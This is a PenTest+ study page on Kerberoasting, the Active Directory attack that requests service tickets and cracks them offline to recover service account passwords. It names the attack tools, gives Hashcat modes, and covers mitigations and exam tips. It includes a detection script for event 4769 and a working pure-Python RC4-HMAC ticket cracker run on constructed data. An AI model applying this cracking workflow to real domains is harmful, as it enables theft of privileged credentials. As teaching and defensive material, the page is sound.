In the context of CompTIA PenTest+, Kerberoasting is a critical post-exploitation technique used to recover service account credentials from Microsoft Active Directory (AD). It abuses the normal architecture of the Kerberos authentication protocol, specifically targeting accounts that have Service Principal Names (SPNs) registered.
The attack mechanism works as follows: Any authenticated user within a domain, regardless of privilege level, can request a Ticket Granting Service (TGS) ticket for any service that has an SPN registered. The weakness lies in how the Domain Controller builds this ticket. A portion of the service ticket (the ticket's enc-part) is encrypted with a key derived from the service account's password. When the ticket is issued with RC4-HMAC (encryption type 23), that key is simply the account's NT hash; when AES is used, the key is derived from the password and a salt, which is considerably slower to attack. Tools such as Rubeus, Mimikatz, or Invoke-Kerberoast request the ticket and extract this encrypted blob, and the Domain Controller hands it over without checking whether the user is authorized to use the service itself, because in Kerberos that authorization decision belongs to the service, not to the KDC. Kerberoasting tools therefore prefer to request RC4-encrypted tickets whenever the target account still permits them.
Once the attacker captures the ticket, they take it offline. Because the encryption key is derived solely from the service account's password, each candidate password can be tested against the ticket without any further interaction with the domain: derive the key, decrypt the blob, and check whether the ticket's integrity checksum verifies. Tools like Hashcat (mode 13100 for RC4, 19600 and 19700 for AES128 and AES256 tickets) or John the Ripper (krb5tgs format) automate this. If the service account has a weak password, the attacker recovers the plaintext credentials.
This is a high-value attack vector because service accounts often hold elevated privileges (sometimes Domain Admin) and their passwords are rarely changed, for fear of breaking application dependencies. To mitigate Kerberoasting, administrators should enforce long, random passwords (over 25 characters) for all service accounts, making offline brute-force attempts computationally infeasible, or better, use Group Managed Service Accounts (gMSAs), whose passwords are long, randomly generated, and rotated automatically by AD. Configuring service accounts for AES-only Kerberos encryption removes the cheap RC4 target, and service accounts should be stripped of privileges they do not need so that a cracked password yields less.
Kerberoasting: Attacks and Exploits
What is Kerberoasting? Kerberoasting is a prevalent post-exploitation attack technique used within Microsoft Active Directory environments. It enables an attacker who has valid credentials for any domain user (even an unprivileged one) to obtain service tickets that are encrypted with keys derived from service account passwords, and then crack those tickets offline to recover the passwords. This technique is distinct because it abuses the legitimate functionality of the Kerberos protocol rather than exploiting a software vulnerability, so there is no patch for it; the only defenses are strong secrets and monitoring.
Why is it Important? In the context of CompTIA PenTest+, Kerberoasting is crucial because it facilitates Privilege Escalation and Lateral Movement. Service accounts often possess elevated privileges (such as Domain Admin rights) and frequently use weak passwords that never expire. Because the cracking process happens offline, it is invisible to the domain; the only on-domain footprint is the burst of TGS requests, which appears on the Domain Controller as Windows Security event ID 4769. Defenders who are not specifically monitoring those requests (for example, one user requesting RC4-encrypted tickets for many different service accounts in a short time) will not see the attack.
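The monitoring gap described above is easiest to understand with the detection written out. The following is an added example, not part of the original page: it runs a simple Kerberoasting detection over constructed Windows Security event 4769 records. Only the 4769 fields that matter here are modelled (TimeCreated, TargetUserName which is the requesting account, ServiceName which is the SPN's account, TicketEncryptionType, IpAddress); the sample events, the five-minute window and the four-service threshold are all assumptions to be tuned per environment.

```python
"""Flag likely Kerberoasting from Windows Security event 4769 (TGS request).

Added example. Event records are constructed and simplified; real events
come from the DC's Security log. Thresholds are assumptions.
"""
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = "0x17"  # etype 23: the cheap-to-crack ticket type Kerberoasting tools prefer


def kerberoast_suspects(events, window=timedelta(minutes=5), min_services=4):
    """Return {requester: sorted service accounts} for every requester that
    obtained RC4 service tickets for at least `min_services` distinct service
    accounts within `window`.

    Computer accounts (ServiceName ending in '$') and krbtgt are ignored:
    their keys are long random secrets and are not what an attacker roasts.
    """
    by_user = defaultdict(list)
    for ev in events:
        svc = ev["ServiceName"]
        if ev["TicketEncryptionType"] != RC4_HMAC:
            continue
        if svc.endswith("$") or svc.lower() == "krbtgt":
            continue
        by_user[ev["TargetUserName"]].append((ev["TimeCreated"], svc))

    suspects = {}
    for user, reqs in by_user.items():
        reqs.sort()
        # Slide a window over this user's RC4 requests, counting distinct targets.
        for start, (t0, _) in enumerate(reqs):
            seen = {svc for t, svc in reqs[start:] if t - t0 <= window}
            if len(seen) >= min_services:
                suspects[user] = sorted(seen)
                break
    return suspects


def _ev(ts, user, svc, etype, ip):
    """Build one constructed 4769-like record."""
    return {"TimeCreated": datetime.fromisoformat(ts), "TargetUserName": user,
            "ServiceName": svc, "TicketEncryptionType": etype, "IpAddress": ip}


# Constructed sample log: jdoe roasts every SPN account in a few seconds,
# alice requests a single legacy RC4 ticket, bob's tickets are AES256 (0x12).
SAMPLE_EVENTS = [
    _ev("2024-05-01T09:00:01", "jdoe@CORP.LOCAL", "svc_sql", "0x17", "10.0.0.55"),
    _ev("2024-05-01T09:00:01", "jdoe@CORP.LOCAL", "svc_iis", "0x17", "10.0.0.55"),
    _ev("2024-05-01T09:00:02", "jdoe@CORP.LOCAL", "svc_backup", "0x17", "10.0.0.55"),
    _ev("2024-05-01T09:00:02", "jdoe@CORP.LOCAL", "svc_sccm", "0x17", "10.0.0.55"),
    _ev("2024-05-01T09:00:02", "jdoe@CORP.LOCAL", "WS01$", "0x17", "10.0.0.55"),
    _ev("2024-05-01T09:00:03", "jdoe@CORP.LOCAL", "svc_exchange", "0x17", "10.0.0.55"),
    _ev("2024-05-01T09:05:10", "alice@CORP.LOCAL", "svc_sql", "0x17", "10.0.0.61"),
    _ev("2024-05-01T09:06:00", "bob@CORP.LOCAL", "svc_iis", "0x12", "10.0.0.62"),
    _ev("2024-05-01T09:06:05", "bob@CORP.LOCAL", "svc_sql", "0x12", "10.0.0.62"),
    _ev("2024-05-01T09:06:06", "bob@CORP.LOCAL", "svc_backup", "0x12", "10.0.0.62"),
    _ev("2024-05-01T09:06:07", "bob@CORP.LOCAL", "svc_sccm", "0x12", "10.0.0.62"),
]


if __name__ == "__main__":
    for user, services in kerberoast_suspects(SAMPLE_EVENTS).items():
        print(f"possible Kerberoasting by {user}: {', '.join(services)}")
```

The RC4 filter is what keeps this rule quiet in a healthy domain, but it is also the rule's blind spot: once an environment is AES-only, tooling falls back to requesting AES tickets, so in that case the burst of distinct SPN requests should be alerted on regardless of encryption type, and any remaining 0x17 request becomes worth investigating on its own.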
How it Works The attack follows a specific workflow built around Service Principal Names (SPNs):
1. Enumeration: The attacker identifies accounts in the domain that have an SPN set. An SPN links a service instance to a domain login account, and any domain user can read SPNs from LDAP.
2. Request: The attacker requests a Kerberos service ticket (TGS) for each targeted SPN using their authenticated session. No special rights are needed; the Domain Controller issues a ticket to any authenticated user.
3. Extraction: The Domain Controller issues the ticket. Crucially, part of this ticket is encrypted with a key derived from the service account's password (the NT hash when the ticket uses RC4-HMAC). The attacker extracts the ticket from memory or from the network and converts it into a hash-cracker format.
4. Offline Cracking: The attacker takes the ticket offline and uses tools like Hashcat or John the Ripper to try candidate passwords against the encrypted segment. If the service account has a weak password, the tool reveals the plaintext credentials.
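Steps 3 and 4 (and the mechanism paragraphs earlier on this page) are clearest when the offline check is written out. The following is an added example, not code from the original page or from any of the tools it names: it builds a constructed RC4-HMAC (etype 23) service ticket blob for a fictional svc_sql account, formats it the way Hashcat mode 13100 expects ($krb5tgs$23$...), and then "cracks" it with a small wordlist by doing exactly what Hashcat does per candidate: MD4 of the UTF-16LE password gives the NT hash, RFC 4757 derives the RC4 and HMAC-MD5 keys from it, and a candidate is correct when the decrypted data verifies against the ticket's checksum. The realm, account, SPN, password, wordlist and the stand-in plaintext are all constructed; a real ticket's plaintext is the ASN.1 EncTicketPart.

```python
"""Offline cracking of a Kerberoast ticket (RC4-HMAC, etype 23) in pure Python.

Added example. Implements the same per-candidate check as Hashcat 13100 /
John's krb5tgs: NT hash -> RFC 4757 keys -> decrypt -> verify HMAC-MD5.
All identities, the password and the wordlist below are constructed.
"""
import hmac
import os
import struct
from hashlib import md5

MASK = 0xFFFFFFFF
KEY_USAGE_TGS_TICKET = 2  # RFC 4120 key usage number for a ticket's enc-part


def md4(data: bytes) -> bytes:
    """RFC 1320 MD4. The NT hash is MD4 over the UTF-16LE password."""
    f = lambda x, y, z: (x & y) | (~x & z)
    g = lambda x, y, z: (x & y) | (x & z) | (y & z)
    h = lambda x, y, z: x ^ y ^ z
    rotl = lambda x, n: ((x << n) | (x >> (32 - n))) & MASK
    msg = data + b"\x80" + b"\x00" * ((55 - len(data)) % 64) + struct.pack("<Q", 8 * len(data))
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    r2 = [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15]
    r3 = [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15]
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        aa, bb, cc, dd = a, b, c, d
        for i in range(16):
            a = rotl((a + f(b, c, d) + x[i]) & MASK, (3, 7, 11, 19)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):
            a = rotl((a + g(b, c, d) + x[r2[i]] + 0x5A827999) & MASK, (3, 5, 9, 13)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):
            a = rotl((a + h(b, c, d) + x[r3[i]] + 0x6ED9EBA1) & MASK, (3, 9, 11, 15)[i % 4])
            a, b, c, d = d, a, b, c
        a, b, c, d = (a + aa) & MASK, (b + bb) & MASK, (c + cc) & MASK, (d + dd) & MASK
    return struct.pack("<4I", a, b, c, d)


def nt_hash(password: str) -> bytes:
    return md4(password.encode("utf-16-le"))


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 stream cipher (used symmetrically for encrypt and decrypt)."""
    s, j = list(range(256)), 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def _k1(nt: bytes, usage: int) -> bytes:
    # RFC 4757: K1 = HMAC-MD5(NT hash, key usage as 32-bit little-endian)
    return hmac.new(nt, struct.pack("<I", usage), md5).digest()


def rc4_hmac_encrypt(nt: bytes, usage: int, plaintext: bytes, confounder: bytes = None) -> bytes:
    """What the KDC does to the ticket enc-part: checksum(16) || RC4(confounder || data)."""
    data = (confounder or os.urandom(8)) + plaintext
    k1 = _k1(nt, usage)
    checksum = hmac.new(k1, data, md5).digest()
    k3 = hmac.new(k1, checksum, md5).digest()
    return checksum + rc4(k3, data)


def rc4_hmac_decrypt(nt: bytes, usage: int, blob: bytes):
    """The cracker's check: decrypt with a candidate key; None unless the checksum verifies."""
    checksum, edata = blob[:16], blob[16:]
    k1 = _k1(nt, usage)
    k3 = hmac.new(k1, checksum, md5).digest()
    data = rc4(k3, edata)
    if not hmac.compare_digest(hmac.new(k1, data, md5).digest(), checksum):
        return None
    return data[8:]  # strip the 8-byte confounder


def to_hashcat(user: str, realm: str, spn: str, blob: bytes) -> str:
    """Hashcat mode 13100 line: $krb5tgs$23$*user$realm$spn*$checksum$edata."""
    return f"$krb5tgs$23$*{user}${realm}${spn}*${blob[:16].hex()}${blob[16:].hex()}"


def crack(hashline: str, wordlist):
    """Try each candidate password against a mode-13100 line; return the hit or None."""
    if not hashline.startswith("$krb5tgs$23$"):
        raise ValueError("only RC4-HMAC (etype 23) tickets are handled here")
    checksum_hex, edata_hex = hashline.rsplit("$", 2)[1:]
    blob = bytes.fromhex(checksum_hex) + bytes.fromhex(edata_hex)
    for pw in wordlist:
        if rc4_hmac_decrypt(nt_hash(pw), KEY_USAGE_TGS_TICKET, blob) is not None:
            return pw
    return None


def demo():
    """Constructed end-to-end run: issue a ticket with the real password, then crack it."""
    realm, user, spn = "CORP.LOCAL", "svc_sql", "MSSQLSvc/db01.corp.local:1433"
    real_password = "Summer2024!"                                   # constructed weak password
    enc_ticket_part = b"<stand-in for the ASN.1 EncTicketPart>" * 3  # constructed plaintext
    blob = rc4_hmac_encrypt(nt_hash(real_password), KEY_USAGE_TGS_TICKET, enc_ticket_part)
    line = to_hashcat(user, realm, spn, blob)
    wordlist = ["Welcome1", "Password123", "Summer2023!", "Summer2024!", "P@ssw0rd"]
    return line, crack(line, wordlist)


if __name__ == "__main__":
    line, hit = demo()
    print(line)
    print("cracked:", hit)
```

Every step in crack() is local arithmetic on a blob the attacker already holds, which is why the page calls the attack offline and why the only domain-side signal is the ticket request itself. It also shows why password length is the mitigation: the cost of the attack is one MD4 plus three HMAC-MD5 and one RC4 per candidate, and a 25+ character random password simply has too many candidates.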
Exam Tips: Answering Questions on Kerberoasting To answer questions correctly on the exam, focus on these associations:
1. Keywords: If a scenario mentions Service Principal Names (SPNs), requesting TGS tickets, offline cracking, or recovering service account credentials, the answer is Kerberoasting.
2. Tools: Recognize the tools associated with this attack, specifically Rubeus, Impacket (GetUserSPNs.py), and Invoke-Kerberoast, with Hashcat or John the Ripper for the offline cracking step.
3. Differentiation: Do not confuse this with Golden Tickets or Silver Tickets. Golden and Silver Tickets involve forging tickets for persistence using a key the attacker already has (the krbtgt account's hash for a Golden Ticket, a service account's hash for a Silver Ticket). Kerberoasting involves obtaining a legitimately issued ticket and cracking it offline to recover a password. The two are related: a password recovered by Kerberoasting is enough to forge Silver Tickets for that service.
4. Mitigation: If asked for remediation, the correct answer is usually to ensure service accounts have long, complex passwords (greater than 25 characters) to make offline brute-forcing computationally infeasible, or to move the service to a Group Managed Service Account (gMSA).